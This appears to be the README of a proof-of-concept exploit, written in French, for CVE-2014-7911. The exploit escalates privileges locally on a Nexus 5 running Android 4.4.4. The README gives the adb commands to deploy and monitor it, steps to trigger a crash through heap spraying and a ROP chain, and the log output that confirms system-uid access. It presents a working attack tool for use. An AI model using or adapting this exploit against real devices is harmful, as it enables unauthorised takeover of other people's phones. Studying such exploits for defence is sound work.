
Exploit de preuve de concept pour l'élévation de privilèges locale sur Android (CVE-2014-7911) ciblant Nexus5 avec ROP chain et heap spraying pour obtenir l'uid system.
POC pour CVE-2014-7911 pour Nexus5 Android 4.4.4_r1 basé sur retme7, utilise une chaîne ROP différente
Connectez votre téléphone via adb
adb push jni/expolit /data/local/tmp
adb logcat | grep auo_
Lancez ce POC, cliquez sur le bouton « CVE-2014-7911 », vous verrez :
D/auo_CVE20147911(24892): staticAddr = 0x43a1f000
D/auo_CVE20147911(24892): heap sparying... 0
D/auo_CVE20147911(24892): heap sparying... 100
D/auo_CVE20147911(24892): heap sparying... 200
D/auo_CVE20147911(24892): heap sparying... 300
D/auo_CVE20147911(24892): heap sparying... 400
D/auo_CVE20147911(24892): heap sparying... 500
D/auo_CVE20147911(24892): heap sparying... 600
D/auo_CVE20147911(24892): heap sparying... 700
D/auo_CVE20147911(24892): heap sparying... 800
D/auo_CVE20147911(24892): heap sparying... 900
D/auo_CVE20147911(24892): heap sparying... 1000
D/auo_CVE20147911(24892): heap sparying... 1100
D/auo_CVE20147911(24892): heap sparying... 1200
D/auo_CVE20147911(24892): heap sparying... 1300
D/auo_CVE20147911(24892): heap sparying... 1400
D/auo_CVE20147911(24892): heap sparying... 1500
D/auo_CVE20147911(24892): heap sparying... 1600
D/auo_CVE20147911(24892): heap sparying... 1700
D/auo_CVE20147911(24892): heap sparying... 1800
D/auo_CVE20147911(24892): heap sparying... 1900
Ensuite, réduisez l'activité plusieurs fois jusqu'à ce que le système plante. Si vous voyez :
D/auo_exploit(22665): uid=1000(system) gid=1000(system)
l'exploit a réussi. Si votre téléphone se contente de planter, votre appareil est vulnérable mais l'exploit a peut-être échoué (vous devez trouver des chaînes ROP différentes).